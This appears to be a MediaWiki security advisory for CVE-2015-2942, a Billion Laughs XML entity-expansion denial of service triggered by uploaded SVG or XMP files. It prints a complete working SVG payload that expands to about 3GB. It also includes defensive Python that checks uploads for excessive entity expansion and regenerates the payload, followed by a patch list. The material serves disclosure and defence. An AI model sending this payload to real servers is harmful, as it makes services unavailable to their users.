iSec found that a standard Billion Laughs attack works with SVGs and PDFs that carry XMP metadata. They tested this on MediaWiki-Vagrant, so it is not clear whether production is vulnerable or not.
FINDING ID: iSEC-WMF1214-13
DESCRIPTION: When uploading an SVG file, or any file which includes XMP metadata, it is possible to include XML Doctype Declarations which trigger a Billion Laughs attack against the XML parser when the uploaded file is processed. This attack uses a series of expanding XML entities which, when fully expanded, result in approximately 3GB of data to be processed. This causes the XML parser to consume all available resources on the system, leaving the webserver unresponsive. An example of a file which exploits this vulnerability is below:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<svg>
<lolz>&lol9;</lolz>
</svg>
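A defender-side pre-check, added here as example code that is not MediaWiki's own, which rejects such a file before any XML parser expands a single entity: it pulls the DOCTYPE internal subset out of the upload, computes each entity's fully expanded length on the reference graph without materialising it, and refuses the file if any entity exceeds a size budget, if references recurse, or if parameter or external entity declarations are present. The 1 MiB budget and the simplified entity grammar (literal-valued general entities only) are assumptions; the sample file is the advisory's own, regenerated in code rather than typed out.

```python
import re
DOCTYPE_RE = re.compile(r'<!DOCTYPE\s[^\[>]*\[(?P<subset>.*?)\]\s*>', re.DOTALL)
ENTITY_RE = re.compile(r'<!ENTITY\s+(?P<name>[^\s%]+)\s+(?P<q>["\'])(?P<value>.*?)(?P=q)\s*>', re.DOTALL)
REF_RE = re.compile(r'&([^;&\s]+);')
MAX_EXPANSION = 1 << 20  # assumed budget: 1 MiB of expanded entity text is ample for a real SVG

def expanded_sizes(subset: str) -> dict:
    """Expanded length of each declared entity, computed on the reference graph; recursion raises."""
    defs = {m.group('name'): m.group('value') for m in ENTITY_RE.finditer(subset)}
    sizes, in_progress = {}, set()
    def size_of(name: str) -> int:
        if name in sizes:
            return sizes[name]
        if name in in_progress:
            raise ValueError(f"recursive entity {name!r}")
        if name not in defs:
            raise ValueError(f"undefined entity {name!r}")
        in_progress.add(name)
        total = len(defs[name])
        for m in REF_RE.finditer(defs[name]):
            ref = m.group(1)
            if ref not in ('lt', 'gt', 'amp', 'quot', 'apos') and not ref.startswith('#'):
                total += size_of(ref) - len(m.group(0))  # swap the reference for its expansion
        in_progress.discard(name)
        sizes[name] = total
        return total
    for name in defs:
        size_of(name)
    return sizes

def check_upload(doc: str, limit: int = MAX_EXPANSION) -> str:
    """Return 'ok' or a rejection reason for an SVG/XMP document before a real XML parser sees it."""
    m = DOCTYPE_RE.search(doc)
    subset = m.group('subset') if m else ''  # no internal subset means nothing can expand
    if re.search(r'<!ENTITY\s+%|\bSYSTEM\b|\bPUBLIC\b', subset):
        return 'reject: parameter or external entity declaration'
    try:
        worst = max(expanded_sizes(subset).values(), default=0)
    except ValueError as e:
        return f'reject: {e}'
    return 'ok' if worst <= limit else f'reject: entity expansion of {worst} bytes exceeds {limit}'

def billion_laughs_sample() -> str:
    """The advisory's sample file, generated rather than typed out; lolN expands to 3 * 10**N bytes."""
    decls = ['<!ENTITY lol "lol">', '<!ELEMENT lolz (#PCDATA)>']
    for i in range(1, 10):  # 'i - 1 or ""' names the previous entity: lol, lol1, ..., lol8
        decls.append(f'<!ENTITY lol{i} "' + f'&lol{i - 1 or ""};' * 10 + '">')
    return ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n<!DOCTYPE svg [\n'
            + '\n'.join(decls) + '\n]>\n<svg><lolz>&lol9;</lolz></svg>\n')
```

The computed size of `lol9` is exactly 3,000,000,000 bytes, which is the "approximately 3GB" the finding describes, and the check reaches that answer in microseconds without allocating any of it.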
Patches:
- 1.24:
- 1.23: (only needed for HHVM, but keep consistent with master for LTS)
- 1.19:
Affected Versions: MediaWiki on HHVM
Type: DoS
CVE: CVE-2015-2942